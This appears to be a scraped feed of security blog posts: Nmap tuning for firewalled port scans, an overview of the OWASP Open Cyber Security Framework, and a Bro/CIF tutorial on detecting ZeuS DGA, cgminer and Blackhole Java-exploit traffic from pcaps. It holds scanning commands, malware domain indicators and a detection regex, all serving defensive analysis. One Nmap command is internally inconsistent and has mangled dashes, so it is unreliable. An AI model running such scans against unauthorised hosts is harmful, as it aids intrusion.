Depending on the amount of hosts, ports and time available, different options will be suitable. Other parameters can also be passed to Nmap relating to how long Nmap should wait for a response, or how many times it should send a packet.

Scanning 100 for 100

If I was scanning 100 hosts and checking the top 100 ports, a command like the following would be useful:
 root@kali:~# nmap –sS –T1 --max-rtt-timeout 2000ms --max-retries 3 --host-timeout 10m –top-ports=1000 –iL hosts.txt



The -–max-retries option limits the amount of retransmissions Nmap sends, the -–max-rtt-timeout option ensures Nmap won’t wait too long for a port to respond and the -–host-timeout option ensures Nmap won’t waste time on hosts that are not responding at all. In the example above I set those options to a 2 seconds timeout for each port, 3 retransmissions and to wait no more than 10 minutes per host.

Against certain firewalls and/or older types of hardware, these options or some variation can often yield an accurate open ports list. In rare cases none of these techniques will work and a syn/ack will be sent for each port, showing the port as open. In such cases more extensive manual testing to investigate the actual response being sent, and determine if there is actually a service listening or not.

NmapAutoAnalyzer

The above techniques are primarily useful when you know a host is alive and need to retrieve an accurate list of open ports. What about in a situation where you are unsure if a host is alive or not because all ports are coming back as filtered and ICMP traffic is blocked? In such cases a firewall or IPS will still generally grant “normal” access to actual open ports.

The above scan types are still useful for this purpose, as if a port is genuinely open and listening the scan will indicate as such although it may be lost in the noise of other ports being falsely reported as open. To determine which hosts are actually alive, the port scan data can be processed to show any hosts with at least one open port which would indicate the host is alive.

There is a script that is very useful for this purpose called Nmap Auto Analyzer, obtainable here. Nmap Auto Analyzer is a ruby script that will sort through Nmap files, and report a list of open ports for each host.

The format is to run Nmap Auto Analyzer is:

 root@kali:~# nmapautoanalyzer.rb –f nmapoutput.xml –r report



The report generated by Nmap Auto Analyzer will show’s hosts us up if they have at least one port open as well as showing why the port is considered open based on the TCP traffic, which can be useful when sorting through scans that included many hosts.

An Open Cyber Security Framework

$
0
0
By Mateo Martinez.

In this blog post we´re going to present a brief overview of the Open Cyber Security Framework Project.

There are a number of frameworks already on the market like the new NIST “Cybersecurity Framework” or “Transforming Cybersecurity using COBIT5” from ISACA and other paid or country-oriented frameworks. However there is no single open framework that governments and organizations can adopt for use as a reference model to start or improve on cybersecurity matters, and this is a real need from the market. There are many governments and organisations working on their Cybersecurity Frameworks starting all from scratch. This open framework will be created with governments and organizations around the globe creating the fact model to be used as a reference from starters to the ones improving or looking for optimized cybersecurity frameworks. The main web page of the project is www.ocsfp.org and the core framework release version 1 is expected for end of March 2014. The OWASP Open Cyber Security Framework Project's aim is to create a practical framework on Cybersecurity.

Creating, Implementing and managing a Cybersecurity Framework has become a need (or may be a must) for many governments and organizations. The Open Cybersecurity Framework Project (OCSFP) is an open project dedicated to enabling organizations to conceive or improve a Cybersecurity Framework. All of the information in OCSFP are free and open to anyone. Everyone is invited to join and collaborate in order to improve all the content that would be available worldwide. It is licensed under the Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one. OCSFP is an OWASP Project since February 2014.

The main objective of the project is to provide a practical Cybersecurity strategy with a 1-2-3 practical phases as shown in the following figure:



There´s a team of active contributors working on the core framework and there´s a very interesting roadmap of releases for this year 2014. Below is the list of open documents that are under development and will be released during the year. There´s an open mailing list to join for those interested in collaborate with OCSFP.

The OCSFP contributors are working hard on the first Framework Core release but there´s also under development open frameworks for different specific Industries like Healthcare, Government, Aeronautics, Telcos and Critical Infrastructure. The first version of all of them will be released during 2014.

Open Cybersecurity Frameworks
  • Open Cybersecurity Framework Core
  • Open Cybersecurity Framework Core Implementation Guidelines
  • Open Cybersecurity Framework for IPv6
  • Open Cybersecurity Framework for Governments
  • Open Cybersecurity Framework for Enterprises
  • Open Cybersecurity Framework for Critical Infrastructure
  • Open Cybersecurity Framework for Aeronautics
  • Open Cybersecurity Framework for Oil & Gas
  • Open Cybersecurity Framework for Healthcare
  • Open Cybersecurity Framework for Telcos
  • Open Cybersecurity Assessment
  • Open Cybersecurity Quick Self-Assessment
  • Open Cybersecurity Quick Reference Guide
  • Open Cybersecurity Free Tools
  • Open Cybersecurity Incident Response Management Framework
  • Open Cybersecurity Framework for Small Biz


For those who are just evaluating their current status on cybersecurity, there´s an quick online assessment with some simple questions about the current Information Security Programs and about the implemented technologies. With the first release of the framework core, a complete assessment will be available online with a table of recommendations for the first steps developing a cybersecurity strategy taking into account your current maturity level.

Some of the available questions in the current online draft are:
  • Do you have a Data Loss Prevention Process?
  • Do you have an Incident Response Program?
  • Do you have a Vunerability Management Process?
  • Do you train your Response Teams in Malware Analysis and Forensics?
  • Do you have a NG Firewall installed?
  • Do you have a dedicated IDS or IPS
  • Do you have a Data Loss Prevention Solution implemented?
  • Do you have a Web Proxy installed?
  • Do you have full disk encryption in you laptops?
  • Do yo have Host Firewall in your organization´s computers?
  • Do yo have Host IPS in your organisation´s computers?
  • Do you have a vulnerability scanner?
  • Do you have any Log Management / SIEM solution?


When you go deeper into the framework you will notice that after the 3 phase strategy there are is a set of activities to be implemented in the cybersecurity strategy:
  • Security Strategy Roadmap
  • Risk Management
  • Vulnerability Management
  • Security Controls
  • Arsenal
  • Incident Response Management
  • Data Loss Prevention
  • Education & Training
  • Business Continuity & Disaster Recovery
  • Application Security
  • Penetration Tests


Last but not least, the project has created a matrix mapping for the controls of SANS Top 20, NIST Cybersecurity Framework and Federal Communications Commission with OCSFP and some other well-known market frameworks are being mapped into OCSFP activities too:



The first release of the framework core will be released at the end of next month and will be available worldwide in order to improve faster on the security posture of organisations and governments.

Identifying Malware Traffic with Bro and the Collective Intelligence Framework (CIF)

$
0
0
By Ismael Valenzuela.

In this post we will walk through some of the most effective techniques used to filter suspicious connections and investigate network data for traces of malware using Bro, some quick and dirty scripting and other free available tools like CIF.

This post doesn’t pretend to be a comprehensive introduction to Bro (check the references section at then end of the post for that) but rather a quick reference with tips and hints on how to spot malware traffic using Bro logs and other open source tools and resources.

All the pcap files used throughout this post can be obtained from GitHub. Some of them have been obtained from the large dataset of pcaps available at contagiodump.

Finally, if you are new to Bro I suggest that you start by downloading the latest version of Security Onion , a must-have Linux distribution for packet ninjas. Since version 12.04.4 Security Onion comes with the new Bro 2.2 installed by default so all you need to do is to open the terminal, grab the samples and maybe some coffee… (There is never enough coffee!).

Traffic Analysis with Bro

We will start replaying our first sample through Bro with:
 $ bro –r sample1.pcap local 



This command tells Bro to read and process sample1.pcap, pretty much like tcpdump or any other pcap tool does. By adding the keyword “local” at the end of the command, we ask Bro to load the ‘local’ script file, which in SecurityOnion is located in /opt/bro/share/bro/site/local.bro.

When the command is completed, Bro will generate a number of logs in the current working directory. These logs are highly structured, plain text ASCII and therefore Unix friendly, meaning that you can use your command line kung-fu with awk, grep, sort, uniq, head, tail and all the other usual suspects.

To see the summary of connections for sample1.pcap we can have a quick look at conn.log:

 $ cat conn.log





The figure above shows an excerpt of the output of this command. Notice how the output of Bro logs is structured in columns, each of them representing different fields. These fields are shown in the 7th line of the output header, starting with "ts" (timestamp in seconds since epoch) and "uid" (a unique identifier of the connection that is used to correlate information across Bro logs). Refer to the Bro documentation to learn more about the rest of the fields.

 #separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path conn
#open 2014-03-07-13-51-01
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes conn_state local_orig missed_bytes history orig_pkts orig_ip_bytesresp_pkts resp_ip_bytes tunnel_parents
#types time string addr port addr port enum string interval count count string bool count string count count count count table[string]




We can observe a number of connections to port 80 (tcp) and port 53 (udp). Conn.log also reports the result of these connections under the field conn_state. Let’s have a closer look at that using bro-cut an awk-based field extractor for Bro logs.

 $ cat conn.log | bro-cut id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto, conn_state

172.16.88.10 49508 172.16.88.135 80 tcp REJ
172.16.88.10 49510 172.16.88.135 80 tcp REJ
172.16.88.10 57852 172.16.88.135 53 udp SF
172.16.88.10 49509 172.16.88.135 80 tcp REJ
172.16.88.10 57399 172.16.88.135 53 udp SF
172.16.88.10 49510 172.16.88.135 80 tcp REJ
172.16.88.10 57456 172.16.88.135 53 udp SF
172.16.88.10 49511 172.16.88.135 80 tcp S0
172.16.88.10 62602 172.16.88.135 53 udp SF
172.16.88.10 54957 172.16.88.135 53 udp SF
172.16.88.10 49511 172.16.88.135 80 tcp SH
172.16.88.10 49512 172.16.88.135 80 tcp S0
172.16.88.10 64623 172.16.88.135 53 udp SF
172.16.88.10 53702 172.16.88.135 53 udp SF
172.16.88.10 49512 172.16.88.135 80 tcp SH
172.16.88.10 49513 172.16.88.135 80 tcp S0
172.16.88.10 52164 172.16.88.135 53 udp SF
172.16.88.10 49513 172.16.88.135 80 tcp SH
172.16.88.10 49516 172.16.88.135 80 tcp S0
172.16.88.10 54832 172.16.88.135 53 udp SF
172.16.88.10 49516 172.16.88.135 80 tcp SH
172.16.88.10 49517 172.16.88.135 80 tcp S0
172.16.88.10 64102 172.16.88.135 53 udp SF
172.16.88.10 51110 172.16.88.135 53 udp SF
172.16.88.10 49517 172.16.88.135 80 tcp SH
172.16.88.10 49518 172.16.88.135 80 tcp S0
172.16.88.10 55957 172.16.88.135 53 udp SF
172.16.88.10 49519 172.16.88.135 80 tcp S0
172.16.88.10 58988 172.16.88.135 53 udp SF
172.16.88.10 49518 172.16.88.135 80 tcp SH



In this case, we can observe that some of the connections attempted on port 80 were rejected (REJ), while others never had a reply (S0) or left the connection half-open (SH, which means a SYN-ACK from the responder was never seen). The reason for this behavior is that sample1.pcap was obtained from one of my sandboxes where 172.16.88.135 is a Virtual Machine running Remnux with fakedns and netcat listening on port 80 instead of a full web server.

Since we know that there is some http traffic going on here, let’s have a look at another log generated by Bro: http.log

 $ cat http.log | bro-cut id.orig_h, id.orig_p, id.resp_h, id.resp_p, host, uri, referrer

172.16.88.10 49493 172.16.88.135 80 f52pwerp32iweqa57k37lwp22erl48g63m39n60ou.net / -
172.16.88.10 49495 172.16.88.135 80 h54jtbqmuj56hwb48e41p42g33h34c29grbqfxm29.ru / -
172.16.88.10 49511 172.16.88.135 80 iqcqmrn30iuoubuo11crfydvkylrbtmtev.info / -
172.16.88.10 49512 172.16.88.135 80 ezdsaqbulsgzh44m59p42eqmrkxa57n40brcq.com / -
172.16.88.10 49513 172.16.88.135 80 o41lwmqnqarmxiyi35iyftpzaye21osjyjq.ru / -
172.16.88.10 49516 172.16.88.135 80 n30arh24frisbslqmqoxgvpvk47o11pritev.biz / -
172.16.88.10 49517 172.16.88.135 80 jsa57n20hyisjxcre11fwl58gta37i65ovf32o51.info / -
172.16.88.10 49518 172.16.88.135 80 j36lxf52hsj56itc49lqayoveymwfzosi15jw.org / -
172.16.88.10 49519 172.16.88.135 80 g53lvo61ayoucrm49kzgvm69irhwl58erjwfu.net / -
...



Anything weird here? Definitely! The host field of the http.log shows entries that don’t seem to correspond with normal browsing.

A closer look at the dns.log produced by Bro will confirm this:

 $ cat dns.log | bro-cut query | sort –u

a37fwf32k17gsgylqb58oylzgvlsi35b58m19bt.com
a47d20ayd10nvkshqn50lrltgqcxb68n20gup62.com
a47dxn60c59pziulsozaxm59dqj26dynvfsnw.com
a67gwktaykulxczeueqf52mvcue61e11jrc59.com
axgql48mql28h34k67fvnylwo51csetj16gzcx.ru
ayp52m49msmwmthxoslwpxg43evg63esmreq.info
azg63j36dyhro61p32brgyo21k37fqh14d10k37fx.com
cvlslworouardudtcxato51hscupunua57.org
cyh44jud50g33iuarlzgqbup22fqisixf62kr.org
d10h34othyp62b18lyfwnzazj26p42fud50gzc49.biz
d20iwe51ftitg53lvl18a27hvlqjyjtd20gue61.com
dqhzhtbto21h14lvp12iqhtlrnxasarcte61.biz
drp42i25ati55m69pvgza57nyh34hwk57i55m19n60.ru
iqcqmrn30iuoubuo11crfydvkylrbtmtev.info
iqo11c69mud20krk57j16fqnrfwgva67oraql48.com
isjqn30a27hwgqbxnxksi65hrnsgyc49mylt.biz
iupqhxfwpylxm29jsexovj16cqfybwb68aw.org
iwpslvesj26i65oynxhtoyc39o41asdvnqc59.com
j36lxf52hsj56itc49lqayoveymwfzosi15jw.org
jshvprc29ntm69p52j36a17m39ozk67g53crfqow.net
jvbtore21fzm39fse51p32auizl28gxaul68px.com
k17g63l58jucvd30brhyovhsptd10lxd60gqfv.biz
k27ori65cve61kvc49hxptdrb48myo61fueves.org
k47isgzkxp62o51etmwazewmvpvgwbvmvfz.com
kqd60lvlsg63bsg33e11i55kvo41nrj36hzbthr.info
kvm49mynrd60l48lynre21hqfun20a47hyn20kq.org
kyoqpxg53nuf42g43oqo21l48a17d40o31k67j16h44.org
l18k17mzpum69jvlyp62c29hzeyi25kta47a37lv.ru
n50owhwguj66evkug33ewntn10n40puhtlxay.org
nrd30j46cxnwmyc69bscrcyiuhvf22otg43mq.com
nub58p52b38ismtg63mwlwm29evd20g13f52otb68.info
nxhyosg43a47exhum19g23f52fro21byayk57fs.info
o21mwm29gzouhvpub68g43dzntgzn30aultd30.net
o31j16n30eyiql58btmxe21euowb38pxf22b68ou.net
psgsgumukxb18b58dxd40e31f22g53a37bzmxcz.com
pxoxgzkqmqp12a47azjzpze11hteri35iti45.info
pyn30h64krm69bwf12azp52fulskvh24m19nrjy.org
(output truncated)





Looking at the length of the domains requested we could observe a pattern. First of all we will cut out the TLDs (com, info, net…) and then calculate the length of each of the strings.

 $ cat dns.log | bro-cut query | sort -u | cut -d . -f1 > domains-withoutTLD
$ for i in `cat domains-withoutTLD`; do echo "${#i}"; done | sort –u

34
35
36
37
38
39
40
41
42
43



So all these strings are within a close range of 34 to 43 characters long. Casualty? Not really, a variant of the ZeuS botnet, the so-called ZeuS Gameover, is known for implementing P2P and Domain Generation Algorithm (DGA) communications to determine the current Command and Control (C&C) domain. When these bots can’t communicate with its botnet via P2P, DGA is used. The domain names generated by ZeuS Gameover consist of a string with a length of 32 to 48 chars and one of the following TLDs: ru, com, biz, net or org. The list contains over 1000 domains and changes every 7 days, based on the current date.

A regular expression like this can be used to search for ZeuS domains:

 [a-z0-9]{32,48}\.(ru|com|biz|info|org|net)


ZeuS Gameover has been reported as one of the most active banking Trojan in 2013, along with Citadel, another well-known piece of malware that has targeted a large number of financial organizations with focus on Europe and the Middle East.

Kleissner.org maintains a list of 1000 valid domains for ZeuS Gameover and updates it every week. A simple bash script can compare a list of domains obtained from dns.log to the list published by Kleissner.org:

 $ cat dns.log | bro-cut query | sort -u | > domains

$ for i in `cat domains`; do grep $i ZeusGameover_Domains; done



SSL Traffic and Notice.log

Malware authors are making increased use of SSL traffic to mask communications with C&C servers, data exfiltration and other malicious actions. Since decrypting SSL communications is not feasible in most of the scenarios, malware analysts must employ other techniques to spot badness in encrypted sessions. TLS or SSL handshake failures, suspicious, invalid or weird certificates can be indicators of such badness in your network traffic and the good news is that Bro, by default, does some of that analysis already for you, suggesting potentially interesting network activity for you to investigate.

To demonstrate how Bro can help with finding those indicators, we’ll look at sample2.pcap

 $ bro -r sample2.pcap local


See that a notice.log file has been created in the working directory, along with http.log, ssl.log and others.

Let’s have a look at the contents of notice.log:

 $ cat notice.log | bro-cut msg, sub

SSL certificate validation failed with (unable to get local issuer certificate) CN=www.tl6ou6ap7fjroh2o.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.vklxa6kz.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.5rthkzelyecfpir56.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.dctpbbpif6zy54mspih.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.getvdkk6ibned7k3krkc.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.hstk2emyai4yqa5.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.icab4ctxldy.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.bnbhckfytu.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.e6nbbzucq2zrhzqzf.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.cvapjjtbfd6yohbarw5q.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.zhbohcqeanv5hw.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.v6onqj4tmlmcchw23bl.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.gaqq6ld5gdgib.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.hlixz2cz43jepqwl.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.jn4k5f5wi65edy7emll.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.4geh5kzuywu3u.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.rshopmsscpfbw6p.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.c2rwawybhf.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.3gbl5nlxxs37ycdbhvcr.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.qhpomorewmsgxkg2d.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.wtytpviziqgpxsz.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.f5zhq25qq.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.3ktww4bg.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.c2nhdwaukm.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.iqm3bvunu.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.pts5agysxnvyyvbysfv.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.ygn472gapjnkkbplith.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.jaaok2kcxn.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.ktq2go444i.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.ferqncujta3wvl.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.2u5j3bw2r.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.uopxo7ik3i2nti.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.2ugfspjvd3tjaa.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.vjonqvyku.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.6canpulqbqdbqkxc6is.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.42ixw6g5fu44w7sth.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.kqwm2iwsvh4xd2q.net
(output truncated)



Hmmm… that looks really suspicious again!

Let’s have a look at the contents of the ssl.log now:

 $ cat ssl.log | bro-cut server_name, subject, issuer_subject

www.seu4oxkf6.com CN=www.tl6ou6ap7fjroh2o.net CN=www.tbajutyf.com
www.fjpv.com CN=www.vklxa6kz.net CN=www.ohqnkijzzo5vt.com
www.pdpqsu.com CN=www.5rthkzelyecfpir56.net CN=www.qbboo7mcwzv7.com
www.vkojgy6imcvg.com CN=www.dctpbbpif6zy54mspih.net CN=www.m6hoayo5cga.com
www.dbyryztrr7sui3rskjvikes.com CN=www.getvdkk6ibned7k3krkc.net CN=www.7pz4gaio6uc25dyfor.com
www.xqwf7xs6nycmciil3t5e4fy5v.com CN=www.hstk2emyai4yqa5.net CN=www.wc62pgaaorhccubc.com
www.rix56ao4hxldum4zbyim.com CN=www.icab4ctxldy.net CN=www.wmylm3gln.com
www.uabjbwhkanlomodm5xst.com CN=www.bnbhckfytu.net CN=www.w4rlc25peis46haafa.com
www.dl2eypxu3.com CN=www.e6nbbzucq2zrhzqzf.net CN=www.cbj5ajz4qgeieshx32n.com
www.ebd7caljnsax.com CN=www.cvapjjtbfd6yohbarw5q.net CN=www.brbqn4rqhscp4rdq.com
www.qnqxclmrk2cqskkb732czjma.com CN=www.zhbohcqeanv5hw.net CN=www.w3rfg432.com
www.bxstw.com CN=www.v6onqj4tmlmcchw23bl.net CN=www.yc2xz27yoe76.com
www.b6lwb6v.com CN=www.gaqq6ld5gdgib.net CN=www.nu6u7osxzhmgx64.com
www.xf3225vc7drvcgborjll3.com CN=www.ryfg74xnxjg42ln3.net CN=www.y6bn3trq5cesxk.com
www.7dezfrpxuvmtr.com CN=www.svhbg7k2ed7ijcloj2.net CN=www.tfijljrmlqi.net
www.pcnia4i6e6w.com CN=www.yastvwre5fvpq3av.net CN=www.c6dmymzw.com
www.zvnbxtgu5dwe6lwc.com CN=www.u7c2brldvuk3xil.net CN=www.owgtwdiazfmzmwu6a5.com
www.ofbw37.com CN=www.qyccfgkjb.net CN=www.gs52pdnqyd.com
www.zr7kfc25mofcq.com CN=www.oi6z76t4.net CN=www.oe7gv5kxhix2i7eil.com
www.cmeh4agzyphi.com CN=www.jnqlvjcoou26znx.net CN=www.p4tgeg6dhp.com
www.k2u3bnbhxhpl.com CN=www.llhtnj3yyk.net CN=www.qotouwlbhjt.com
www.bneghg3axzl75sn7k2pdzor.com CN=www.shucgk26k4x5inet.net CN=www.j4n2j3sz57cf.com
www.ytedf3vqd4hxjo7rmhe6.com CN=www.noyxmydlc3ncgwv4t7hc.net CN=www.xem2wczmpqtypvzzpsex.com
www.by4seu7gjht7.com CN=www.wgrv4vpyx.net CN=www.eyvoebmi4ls6o6.com
www.cx7dg5bcn4cy.com CN=www.lipko2t5yqirjrqn2e.net CN=www.l4kvblp6bd.com
www.zn26rblhi.com CN=www.5nmv7zbdqdvgbfem6l.net CN=www.l3zkpiwawmpwjbzf.com
www.ecajni2stg3733w4jgi75.com CN=www.k3dbsxb423am5bwcb.net CN=www.uuwdimryu2gi42.com
www.x3os5xrkcr7a2rpmxre2.com CN=www.km6ptswm7mo.net CN=www.giovpc7o3.com
www.2c27bhbej.com CN=www.pymflkqpqdgghnfj.net CN=www.jocupasu2o6b2af2tn.com
www.4x4fp.com CN=www.icab4ctxldy.net CN=www.wmylm3gln.com
www.busdvimuibiundyob3e74js.com CN=www.xwwc4mvab66dnn.net CN=www.7hhuhzlztld46.com
www.zk2sv4vbwtanvh6x.com CN=www.bjxrmwnhp44enzypv6dc.net CN=www.b2ond2dxj.net
www.nijvbs5nuyn7zkemgi.com CN=www.wgwr7qn7v3j.net CN=www.u57w6yc5rvv.com
www.hamsnp.com CN=www.ge26nt2rx.net CN=www.aewmz33hq6rn7x7nud3.com
www.gsen3cievf3px7anzc6j.com CN=www.3zz5we62e.net CN=www.w7sb5mdv7w.com
www.3lwerxmlqmq2jsjioqgx5kkyc.com CN=www.ohfe52bk6gyfzojwgts.net CN=www.jhzi7jmhledqxg.com
www.2ipe23pugsiii.com CN=www.6hfs2womid.net CN=www.aq3w5zrobmejm.com
www.f3vzvxsedn.com CN=www.eelcaqcncssfzliilic.net CN=www.xshjb4uihtmpxh.com
www.hh62esff4qj5.com CN=www.mqhz74wxch4gj.net CN=www.wcmcdpazt7iw7g.com
www.juipuxm76hu6df6.com CN=www.5nmv7zbdqdvgbfem6l.net CN=www.l3zkpiwawmpwjbzf.com
www.6ll3wnw5dmg.com CN=www.suy5hv542.net CN=www.5mypgv7tgzypyaz63w.com
www.h5hgbrs75gl3c5uh5xnld3i.com CN=www.4x4j6xhtk5qh.net CN=www.rmybfv4mrpzlcicfg.net



Again, parsing these logs with bro-cut and other command line tools to generate a list of suspicious domains is straightforward. That list can be compared to a list of well-known malicious domains, or used with various domain reputation services. We will talk more about how to leverage threat intelligence feeds with Bro later in this post.

Let’s carry on with our analysis. A closer look at the http.log reveals some potentially interesting User Agents under the user_agent field:

 $ cat http.log | bro-cut user_agent | sort –u

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

cgminer 2.7.5



Can you see that cgminer user agent? It is a well known fact that malware can use unusual, weird or unique user agents as part of the headers of the HTTP requests. A good study on that was written by Robert Vandenbrink.

In this case the user agent indicates that we’re looking at a bot whose purpose is to deliver bitcoin mining traffic. For more information about this particular bot check Liam Randall’s solutions and scripts on his GitHub

The new file analysis framework

The file analysis framework is a new feature introduced with Bro 2.2 that provides plenty of new functionalities to network analysts. One of the most powerful features is the ability to extract files from network streams based on multiple criteria: geo spatial (i.e. per country of origin), signature based, destination based, etc.

Files can be extracted from various protocols including FTP, HTTP, SMTP and IRC. Others like Bit torrent and SMB will be added in the near future.

Thanks to the powerful Bro language, the new file analysis framework can be combined with actions to do awesome stuff like look up in a malware hash registry, upload to virustotal, to a cuckoo sandbox or even tweet the results of your analysis!

To demonstrate some of its capabilities we’ll analyze sample3.pcap. As usual we start replaying the capture with Bro:

 $ bro -r sample3.pcap local


You should have a new log: files.log. Let’s have a look at its contents:

 $ cat files.log | bro-cut fuid, mime_type, filename, total_bytes, md5

FC7cMq18xeqtT9IGD3 application/zip - 31044 0cbc25ade65bcd7a28dd8ac62ea20186



We have a unique entry. We don’t have a filename but Bro has recorded the MIME type and even computed the MD5 hash for us!

Can we extract that file? Of course we can! Open your text editor of choice and save these lines as extract-all.bro
 event file_new(f: fa_file)
{
Files::add_analyzer(f, Files::ANALYZER_EXTRACT);
}



Congratulations! You’ve written your first Bro script. Next, run the capture against Bro again, this time replacing the ‘local’ script with the new one you just created. You might need to run this as root:

 $ bro -r sample3.pcap extract-all.bro


This command will create a new directory extract_files where all files extracted will be located:

 $ ls extract_files

extract-HTTP-FC7cMq18xeqtT9IGD3



Let’s confirm what kind of file we’re looking at:

 $ file extract-HTTP-FC7cMq18xeqtT9IGD3 

extract-HTTP-FC7cMq18xeqtT9IGD3: Zip archive data, at least v2.0 to extract

$ xxd extract-HTTP-FC7cMq18xeqtT9IGD3 | head -10

0000000: 504b 0304 1400 0808 0800 208f 1c41 0000 PK........ ..A..
0000010: 0000 0000 0000 0000 0000 0d00 0000 6234 ..............b4
0000020: 612f 6234 612e 636c 6173 73c5 7979 5c9b a/b4a.class.yy\.
0000030: 5b76 d8b9 9240 427c 8010 1606 db18 63fb [v...@B|......c.
0000040: 6110 606c 24b0 0783 0149 0801 daf7 0d09 a.`l$....I......
0000050: edfb 2eb4 22e4 7979 33c9 bc74 3259 babd ....".yy3..t2Y..
0000060: d725 93ce 6bac a493 f4bd e729 76e3 cc8c .%..k......)v...
0000070: d32d 69d2 25d3 769a a64d 9ba6 49da a4cd .-i.%.v..M..I...
0000080: d2c9 d2e9 b44d 9c73 0578 c36f dee4 af9a .....M.s.x.o....
0000090: 9fbe 7bbe 7bcf 3dfb 39f7 9ecf 3fff a73f ..{.{.=.9...?..?

$ xxd extract-HTTP-FC7cMq18xeqtT9IGD3 | tail -10

00078b0: db66 0000 6234 612f 6234 642e 636c 6173 .f..b4a/b4d.clas
00078c0: 7350 4b01 0214 0014 0008 0808 0020 8f1c sPK.......... ..
00078d0: 4167 fdc8 0309 0700 00a7 0f00 000d 0000 Ag..............
00078e0: 0000 0000 0000 0000 0000 0034 7000 0062 ...........4p..b
00078f0: 3461 2f62 3465 2e63 6c61 7373 504b 0102 4a/b4e.classPK..
0007900: 0a00 0a00 0008 0000 208f 1c41 0000 0000 ........ ..A....
0007910: 0000 0000 0000 0000 0400 0000 0000 0000 ................
0007920: 0000 0000 0000 7877 0000 6234 612f 504b ......xw..b4a/PK
0007930: 0506 0000 0000 0700 0700 9401 0000 9a77 ...............w
0007940: 0000 0000 ....



While the first bytes in the file header (also known as magic numbers) suggest a ZIP file, the content of the file indicates the presence of Java class files. We can easily confirm that by executing:

 $ jar xf extract-HTTP-FC7cMq18xeqtT9IGD3


Which extracts the Java classes to the b4d directory.

We’ll leave the analysis of the Java classes for now, but can you identify if this is a malicious file with the information we have at this moment? Well, let’s see what others know about this file. Remember the MD5 hash included in the files.log? A quick search in Virustotal reveals that we’re looking at a Java 0-day that was included in the Blackhole Exploit Kit (CVE-2012-4681).

As you can see, the possibilities of using the new file analysis framework are endless. Add a bit of knowledge of the Bro programming language, some python scripting goodness and a few APIs to malware analysis services and you have an awesome cocktail!

Bro, Threat Intelligence and CIF

Threat Intelligence is the new holy grail of security. Finding relevant and up-to-date information on malicious threats is key for all the phases of the security lifecycle, from prevention, to detection, incident response, containment and forensic analysis. The most common types of threat intelligence required by analysts are IP addresses, domains, urls and file hashes that have been observed in relation to malicious activity.

Many organizations provide data feeds that are freely available and that can be used with the new Bro’s Intel Framework to log hits seen in network streams, like those from ZeuS and SpyEye Tracker, Malware Domains, Spamhaus, Shadowserver, Dragon Research Group, and others.

While you could download these data feeds on a regular basis, maintaining an updated repository that is actually usable by your tools can be a daunting task, especially given the number of sources and disparity of formats used. This is where the Collective Intelligence Framework (CIF) comes to the rescue.

CIF is now on version 1 (stable) and allows you to parse, normalize, store, process, query, share and produce data sets of threat intelligence.

Having installed a few CIF servers I can tell you it’s somewhat complex (maybe not complex but rather tedious), so I will refer you to the official documentation if you want to set up your own instance (see the References below). For the rest of this section I will assume that you have access to a running instance of CIF.

To enable the Bro Intel Framework and allow the integration of CIF feeds, add these three lines to your local.bro file (in Security Onion that’s in /opt/bro/share/bro/site/local.bro):

 @load frameworks/intel/seen
@load frameworks/intel/do_notice
@load policy/integration/collective-intel



CIF is used mainly in two ways: either to query for data stored about an IP address, a domain or a url, or to produce feeds based on the stored data sets. The data feeds available in version 1 can be seen here:


In our example, we’ll generate a list of domains related to malware with a confidence level of 75 or greater. To make sure the output is formatted for Bro append “-p bro

 $ cif -q domain/malware -c 75 –p bro > domain-malware.intel


Note that this command won’t work if you don’t have CIF installed. If you don’t have access to a CIF server you can grab a copy of a file formatted for Bro here (note that this will be outdated by the time you download it so use it for testing purposes only).

The figure below shows the contents of the file generated in CIF’s native format (without using the BRO plugin).



In order to import the new data feed we just generated we need to configure Bro’s Input Framework. To do so, add the following lines to your local.bro file:

 redef Intel::read_files += {
"/opt/bro/feeds/domain-malware.intel",
};



